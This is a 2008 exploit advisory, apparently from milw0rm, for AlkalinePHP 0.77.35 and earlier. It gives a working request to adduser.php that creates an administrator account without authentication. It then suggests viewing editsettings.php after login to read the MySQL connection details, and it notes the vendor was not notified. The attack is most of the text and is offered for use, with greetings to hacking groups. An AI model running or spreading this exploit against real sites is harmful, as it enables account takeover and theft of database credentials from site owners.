63 lines
No EOL
1.8 KiB
Text
63 lines
No EOL
1.8 KiB
Text
--==+================================================================================+==--
|
|
--==+ AlkalinePHP <= 0.77.35 (adduser.php) Arbitrary Add-Admin +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
[*] Discovered By: t0pP8uZz
|
|
[*] Discovered On: 17 MAY 2008
|
|
[*] Script Download: https://sourceforge.net/projects/alkalinephp/
|
|
[*] DORK: N/A
|
|
|
|
|
|
|
|
[*] Vendor Has Not Been Notified!
|
|
|
|
|
|
|
|
[*] DESCRIPTION:
|
|
|
|
AlkalinePHP suffers from a insecure adminpage, since the page only handles requests the author probarly
|
|
thought it was safe not to include admin checking, but when we view the source we can cleary see theres
|
|
nothing to stop us making our own request.
|
|
|
|
navigating to the below url (with domain replaced of course) will add a admin account.
|
|
|
|
do not forget to replace "[user]" and "[pass]" with a actual "username" and "password".
|
|
|
|
|
|
|
|
[*] Vulnerability:
|
|
|
|
http://site.com/adduser.php?real_name=null&user_name=[user]&password=[pass]&level=10&email=null@null.com&website=null&misc=null
|
|
|
|
|
|
|
|
[*] NOTE/TIP:
|
|
|
|
after running the above url (with domain replaced of course) it may seem nothing has happend,
|
|
but try loggin in after with the username and password you created.
|
|
|
|
admin login is the normal user login.
|
|
|
|
once your admin you can look here to view the mysql connection information "/editsettings.php"
|
|
another intresting file to view is "/edituser.php"
|
|
|
|
|
|
|
|
[*] GREETZ:
|
|
|
|
milw0rm.com, h4ck-y0u.org, CipherCrew !
|
|
|
|
|
|
|
|
[-] peace,
|
|
t0pP8uZz
|
|
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ AlkalinePHP <= 0.77.35 (adduser.php) Arbitrary Add-Admin +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2008-05-18] |